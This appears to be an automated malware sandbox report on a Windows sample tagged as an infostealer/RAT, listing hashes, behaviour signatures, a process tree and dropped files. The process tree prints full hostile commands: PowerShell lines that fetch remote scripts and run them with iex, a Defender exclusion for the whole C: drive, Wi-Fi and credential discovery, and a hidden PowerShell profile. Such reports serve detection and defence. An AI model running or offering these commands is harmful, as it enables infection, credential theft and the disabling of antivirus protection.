Analysis

  • max time kernel
    137s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2024, 03:22

General

  • Target

    2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    0d764aa58a2696667e32c13013efbc4c

  • SHA1

    726c24532981b7d0f024e777fdf3f8666f48747b

  • SHA256

    5bb944987ea6fa80d95164cce3351e322816674075fd9c978b5d170e8df8b7c4

  • SHA512

    0459c87ad759022df0861934c67e4a960f379282bee10d42be02ddb3f4119275244fa4f23ebbf67a0a669c6b4d38e3dc7c222cf1f3882b84da9f5f59897fdc28

  • SSDEEP

    196608:EzJfx6npoOG6esw8VcejaO779PVJUW9ydW:EZxTOG61w8meWmU

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Looks for VMWare drivers on disk 2 TTPs 2 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe"
    1⤵
    • Looks for VirtualBox drivers on disk
    • Looks for VMWare drivers on disk
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3324
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m2fhsgo2\m2fhsgo2.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4312
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp" "c:\Users\Admin\AppData\Local\Temp\m2fhsgo2\CSCC001113B445E4201B2C5ACFDA97752E2.TMP"
          4⤵
            PID:4320
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:4060
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4948
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:2008
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:4680
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:4324
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:512
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:320
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:640
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1792
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:3800
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:4188
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:4916
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:5016
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:3052
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:3884
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:3680
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:4032
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3476
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n1ljwtqc\n1ljwtqc.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1904
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8B1.tmp" "c:\Users\Admin\AppData\Local\Temp\n1ljwtqc\CSC62B24FB44F824CC49CFE77938B4E5798.TMP"
                          4⤵
                            PID:4956
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c start facebook.com
                        2⤵
                          PID:4596
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3980
                        • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                          PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4176
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                          2⤵
                          • Views/modifies file attributes
                          PID:628
                        • C:\Windows\system32\cmd.exe
                          cmd /c rundll32.exe user32.dll,SwapMouseButton
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4812
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe user32.dll,SwapMouseButton
                            3⤵
                              PID:2360
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM wallpaper32.exe
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4044
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x50c 0x514
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2608

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          724d663b42fbf2544b3328fdcc42f18c

                          SHA1

                          53c13dd9c10e3b8601882029f73e3986b0447542

                          SHA256

                          3e01270457863fb7c51c846db03cf0728b1e4d451cf7dba47a52e27bb945a35e

                          SHA512

                          ee5ffb040a49fcc0c507331c1b95741a1ec4ed516524e2eaaaea76aea15bb2e77d743161085eec519946d1ae458066588b36a5f4b1df41ec70b66780363ea343

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          0789009e381ff689e09144d17087b434

                          SHA1

                          43ecb03b5bf2aedd9a0ef7aad408f32b3ecf2eed

                          SHA256

                          120dcff0b78993813606335996b0ff453a428710a8f2af6700070fb210cacdad

                          SHA512

                          4064b89ef58eab748f0ec6a4ce619b04fb321df90fe32c54ed65e3f02e0116897b066eb41a3586ef8bb513f252b828598196f43e16f3b669d8f11a949b3d65a8

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          b1e374796cfd7cb17346f633f5880d6c

                          SHA1

                          4f0622701a753ff3e5d42552383919a82490b9f2

                          SHA256

                          af080ab2d0d84c84a23c64a9e2532e2bc03651e03806cb9c629d900a33c4e214

                          SHA512

                          17cff6debae6ebbd4ffec33a37d85fb3768bae2d644ca9986627be988ce6dcd8d51f5ce5337dab083302bccf505aaa0168c3e1a6bfbd6edad2476f7d48e4ed58

                        • C:\Users\Admin\AppData\Local\Temp\RESB8B1.tmp

                          Filesize

                          1KB

                          MD5

                          4c4a6bc34a8c9fa382deec5469062b01

                          SHA1

                          78afb38db21ba614190abfc50cd82c63ada683e2

                          SHA256

                          deb10b352754e913b49007eae05c657946b9a990def881448e84774415cb29e7

                          SHA512

                          ef58c92fba50aeb8b95251e87ed54146436e215ebd07a50febdb474e5b931c877cf8a2d712b1aa5d4724a30a8fadff9e0d982e35f383878a733082b396135a5a

                        • C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp

                          Filesize

                          1KB

                          MD5

                          f2671224acdb6b287a8e8d998022e9d2

                          SHA1

                          1148db5ca8ab1cf9546c15337547287d6a46eda3

                          SHA256

                          dcd0a6387f52ddc751b0d7106e07b0511d8c501c5110707bd7c5e68113d68548

                          SHA512

                          6441d04b0dd85079dcb1e91828db01ac4bc39399bfca907103a1b81a8420f5657a632ed39cc5737975380b7464916aa52a94a1aaccc7728d2728cd358c994d96

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                          Filesize

                          93KB

                          MD5

                          30c5e4f1a6150bd269f0b8dd1087ef2d

                          SHA1

                          6a455ac2f3e19ae7f340e96d178c1632360c7257

                          SHA256

                          7d48aed18177c074bab976cd0a19b72a15c7499a395047582ffd5bcf071365ce

                          SHA512

                          8ceeb43bea65a010e040f08845cec1443ba23d99ddb733e56a9d04a75a1b138f73cce91fe9bc5081b692c4b9afe6ebe7a7070418fe201a039b5680a76f0d1e0f

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                          Filesize

                          24KB

                          MD5

                          b96519b314630cb60e3ce7c9212c6694

                          SHA1

                          36f1b8fad905029f51982b4f408e614ed01df64b

                          SHA256

                          5c6c96119c98b3cc42539232a1a3286fa23c16a55408c1c31e0b1bb0fba48e7c

                          SHA512

                          0f5ee94496b64639d1a1906e98249fab676e4341a0b1ab0ed2a6f56265dd36d6eb46c61d59a576e12332ed73d82aa2501c8124aa1d67a779e4e7934cdd040be7

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgjqwd4b.sip.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\m2fhsgo2\m2fhsgo2.dll

                          Filesize

                          4KB

                          MD5

                          ae79c0fc0e5e20864ae3654d76607b94

                          SHA1

                          b57f8782717e902a478b6bd87e58061e01205424

                          SHA256

                          e4d1f1a249685797d2db3444a2bba615b94ee841da2cc246b68c37a7516cc3c2

                          SHA512

                          3963a33fb17e8b7929cdd2c00aca7714314beeac28bb3982f970689ee9e25fcc498b06cdade7025d6316936922fcd1980bd6d52a9e0bfaa4499def079abf0234

                        • C:\Users\Admin\AppData\Local\Temp\n1ljwtqc\n1ljwtqc.dll

                          Filesize

                          4KB

                          MD5

                          06aa9989d2ef44c5780843fc12a23922

                          SHA1

                          e7b6e75e645f1be831ec5c3e6851e08156900599

                          SHA256

                          7859a7f54b7acd09b416a20bdf6b5877ff73da0c6a7e309a072ddbb04fa75a8d

                          SHA512

                          2a950411eee5c3b9b968e4e4aa423a58251e6a948f43c4a71a6b3fa7e30557186ddc87005a7ee8e04f6e8de09b2466895a223f3f2b9833e92cb8443a9d65f586

                        • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                          Filesize

                          2KB

                          MD5

                          9758656bbe8589c66bb241b052490c72

                          SHA1

                          b73da83fb3ae6b86c6365769a04de9845d5c602c

                          SHA256

                          e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                          SHA512

                          da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                        • \??\c:\Users\Admin\AppData\Local\Temp\m2fhsgo2\CSCC001113B445E4201B2C5ACFDA97752E2.TMP

                          Filesize

                          652B

                          MD5

                          b95879473c8bfd75e0a2cf3ec5ae8284

                          SHA1

                          f054e63d02f9f4375768dbc72db4da2bea8c7688

                          SHA256

                          3127938d5cfe482668495e56e31006718ce6fd5e63822ccddc3b4782b56f387d

                          SHA512

                          a0ce6d7caabf4674197e3a6bc3e2ebbc2f36783a99da2dfab57526131f42da2a4dd75906651cd6dff545addfe4e20c133bd3feaa40b1961ad1b092da0a01541c

                        • \??\c:\Users\Admin\AppData\Local\Temp\m2fhsgo2\m2fhsgo2.0.cs

                          Filesize

                          1KB

                          MD5

                          8a1e7edb2117ec5dde9a07016905923b

                          SHA1

                          0155dbeeb16333e2eaa767b0209750efee56f47f

                          SHA256

                          c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                          SHA512

                          4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                        • \??\c:\Users\Admin\AppData\Local\Temp\m2fhsgo2\m2fhsgo2.cmdline

                          Filesize

                          369B

                          MD5

                          6cb667c7df112e36abf577000883cf2c

                          SHA1

                          1ceb3e499210b0c62652131387f9ae563a5cba30

                          SHA256

                          02b460494f39250ab46359c6cafb0ec367271c4f0be26a488c470499146ca8fd

                          SHA512

                          9592c675f2a42492df49da6fdce1eb2445ff8eb7be2760c03c7465d5bf81f19eb48041bd20840a7d259f58d937a3e2ff2d705ba8aa6ab3827fe8987eb8fd6393

                        • \??\c:\Users\Admin\AppData\Local\Temp\n1ljwtqc\CSC62B24FB44F824CC49CFE77938B4E5798.TMP

                          Filesize

                          652B

                          MD5

                          6ef72bf6216310f35ef76efa7c72939e

                          SHA1

                          fcaf754a63be7b0ce8d8fc85b62b70c6edcf5492

                          SHA256

                          8ce14117b1f9a7a745892ae58474ddb1e17c87e3dbc34969958c54d7f8052c45

                          SHA512

                          20b9a815e37695696b4d301811eee9eec197a39a262d191c9da5163f142f73bc2413e957c6dd7f96b0e10b3958d0c437de887e3648597ca87dbc19311cf0cb19

                        • \??\c:\Users\Admin\AppData\Local\Temp\n1ljwtqc\n1ljwtqc.cmdline

                          Filesize

                          369B

                          MD5

                          40cd258a8922fe87104ddf0c9ad8a476

                          SHA1

                          e63f2a0bfef55cf4c2e7683a6f73add2d93a2a7f

                          SHA256

                          781d42725ef0307b3d8208962fb9d4d61122d9bb84b7a3f4de37cc3645da621b

                          SHA512

                          4138ae3d9afc3eccb5fe920c78cad528679d6201d1ae61f004a54a6eb2a70a6d51f53bbb96a1fe65c83d39b14cd39e6fc2e19c29fbd03aaa11d4cc3c1208115b

                        • memory/3324-129-0x0000015366F00000-0x0000015366F0A000-memory.dmp

                          Filesize

                          40KB

                        • memory/3324-128-0x0000015366F10000-0x0000015366F22000-memory.dmp

                          Filesize

                          72KB

                        • memory/3324-77-0x00000153025C0000-0x00000153025C8000-memory.dmp

                          Filesize

                          32KB

                        • memory/3324-97-0x0000015366FF0000-0x0000015367014000-memory.dmp

                          Filesize

                          144KB

                        • memory/3324-96-0x0000015366FF0000-0x000001536701A000-memory.dmp

                          Filesize

                          168KB

                        • memory/3476-11-0x0000025C58600000-0x0000025C58622000-memory.dmp

                          Filesize

                          136KB

                        • memory/3476-91-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3476-85-0x0000025C734F0000-0x0000025C73C96000-memory.dmp

                          Filesize

                          7.6MB

                        • memory/3476-74-0x0000025C585F0000-0x0000025C585F8000-memory.dmp

                          Filesize

                          32KB

                        • memory/3476-0-0x00007FF8DCC73000-0x00007FF8DCC75000-memory.dmp

                          Filesize

                          8KB

                        • memory/3476-21-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3476-1-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3980-33-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3980-82-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

                          Filesize

                          10.8MB